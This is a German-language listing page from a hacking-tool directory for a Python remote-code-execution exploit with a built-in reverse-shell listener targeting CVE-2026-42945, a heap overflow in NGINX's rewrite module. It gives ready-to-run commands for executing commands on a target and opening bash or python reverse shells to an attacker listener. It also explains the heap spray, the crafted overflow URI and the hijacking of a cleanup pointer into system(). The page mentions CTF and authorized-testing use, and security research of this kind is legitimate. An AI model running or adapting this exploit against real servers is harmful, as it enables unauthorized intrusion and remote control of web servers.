Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-42945-Reverse-Shell-POC — Python RCE PoC mit Reverse-Shell-Listener für CVE-2026-42945 (NGINX Rift) | Kitploit
Tools/GitHubGitHub/sec-sys/cve-2026-42945-reverse-shell-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsRed TeamingRemote-Access-ToolBinary-Exploitation
GitHubsec-sys/cve-2026-42945-reverse-shell-poc

CVE-2026-42945-Reverse-Shell-POC

Python RCE PoC mit Reverse-Shell-Listener für CVE-2026-42945 (NGINX Rift)

Repository anzeigen
3vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-42945 (NGINX Rift) RCE PoC mit Reverse Shell

Proof-of-Concept für Remote-Code-Ausführung für CVE-2026-42945, einen Heap-Pufferüberlauf im ngx_http_rewrite_module von NGINX. Dieser Fork erweitert das öffentliche Trigger-PoC um einen eingebetteten Reverse-Shell-Listener und konfigurierbare Exploit-Parameter für CTF und isolierte Laborumgebungen.


Zusammenfassung der Sicherheitslücke

  • CVE-ID: CVE-2026-42945
  • Alias: NGINX Rift
  • Betroffene Komponente: ngx_http_rewrite_module
  • Betroffene Versionen: NGINX Open Source 0.6.27 – 1.30.0; NGINX Plus R32 – R36
  • Behobene Versionen: NGINX Open Source 1.30.1 / ; NGINX Plus , ,
1.31.0
R36 P4
R35 P2
R32 P6
  • Grundursache: Fehlanpassung der Zwei-Durchlauf-Script-Engine. Der Längenberechnungsdurchlauf läuft auf einer frischen Sub-Engine mit is_args = 0, während der Kopierdurchlauf auf der Haupt-Engine mit is_args = 1 läuft und ngx_escape_uri(..., NGX_ESCAPE_ARGS) aufruft. Escape-fähige Bytes dehnen sich auf jeweils 3 Bytes aus, was einen zu kleinen Heap-Puffer mit angreiferkontrollierten URI-Daten überlaufen lässt.
  • Voraussetzungen für RCE: Verwundbare rewrite/set-Konfiguration mit unbenannten PCRE-Erfassungen ($1, $2) plus ? im Ersetzungsstring; deaktiviertes ASLR oder bekannte Heap/libc-Basisadressen; Fähigkeit, den Heap über POST-Bodies zu besprühen.

  • Dateien

    DateiBeschreibung
    cve_2026_42945_rce_poc.pyPython-Exploit mit integriertem Reverse-Shell-Listener und Befehlsausführungsmodi.

    Anforderungen

    • Python 3.8+
    • Ziel-NGINX-Instanz, die der verwundbaren Version und dem Konfigurationsprofil entspricht.
    • Netzwerkerreichbarkeit zum Ziel-HTTP-Port.
    • Für Reverse Shell: Der Angreifer-Host muss vom Ziel aus über den gewählten Listener-Port erreichbar sein.

    Verwendung

    Einzelnen Befehl ausführen

    root@kitploit:~
    python3 cve_2026_42945_rce_poc.py \
      --host 10.0.0.5 \
      --port 80 \
      --cmd "id > /tmp/pwned"
    

    Reverse Shell starten (Standard Bash)

    root@kitploit:~
    python3 cve_2026_42945_rce_poc.py \
      --host 10.0.0.5 \
      --port 80 \
      --shell \
      --listen-ip 10.0.0.1 \
      --listen-port 1337
    

    Python Reverse Shell Payload

    root@kitploit:~
    python3 cve_2026_42945_rce_poc.py \
      --host 10.0.0.5 \
      --port 80 \
      --shell \
      --shell-type python \
      --listen-ip 10.0.0.1 \
      --listen-port 1337
    

    Adressen für ein bestimmtes Ziel kalibrieren

    root@kitploit:~
    python3 cve_2026_42945_rce_poc.py \
      --host 10.0.0.5 \
      --port 80 \
      --shell \
      --listen-ip 10.0.0.1 \
      --listen-port 1337 \
      --heap-base 0x555555659000 \
      --libc-base 0x7ffff77ba000 \
      --system-offset 0x50d70
    

    Funktionsweise

    1. Heap Spray: Senden Sie mehrere POST-Anfragen mit Bodies, die eine gefälschte ngx_pool_cleanup_s-Struktur enthalten: system@libc | Zeiger auf Befehl | null. Diese Bodies belegen stabile Heap-Positionen.
    2. Trigger Overflow: Senden Sie eine manipulierte GET-Anfrage an einen verwundbaren rewrite-Endpunkt. Das URI-Muster ist:
      root@kitploit:~
      /api/<349 x 'A'><969 x '+'><6-byte heap address>
      
      Der Überlauf beschädigt den cleanup-Zeiger eines benachbarten ngx_pool_t.
    3. Code-Ausführung: Wenn der Pool zerstört wird, ruft der beschädigte cleanup-Zeiger system(command) auf und führt den angreiferkontrollierten Befehl im NGINX-Worker-Prozess aus.
    4. Reverse Shell: Wenn --shell verwendet wird, ist der Befehl ein Reverse-Shell-Payload und der eingebettete Listener fängt die eingehende Verbindung.

    Sicherheitshinweis

    Dieses Tool ist vorgesehen für:

    • CTF- und Laborübungen.
    • Autorisierte Penetrationstests mit schriftlicher Genehmigung.
    • Sicherheitsforschung und Härtungsaktivitäten.

    Nicht auf Systemen verwenden, die Sie nicht besitzen oder für die Sie keine ausdrückliche Testgenehmigung haben.


    Lizenz

    Nutzung auf eigenes Risiko. Der Autor übernimmt keine Verantwortung für unbefugte oder illegale Nutzung.


    Quellenangabe

    Ursprüngliche Sicherheitslückenforschung und PoC von depthfirstdisclosures (https://github.com/depthfirstdisclosures/nginx-rift). Dieser Python-Reverse-Shell-Fork wurde für Red-Team-Labore/CTF-Nutzung erstellt.


    Referenzen

    • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-42945
    • NGINX Security Advisories: https://nginx.org/en/security_advisories.html
    • F5 / NGINX Knowledge Base: https://my.f5.com/manage/s/article/K000161019
    • Original research repository: https://github.com/depthfirstdisclosures/nginx-rift
    Tool herunterladen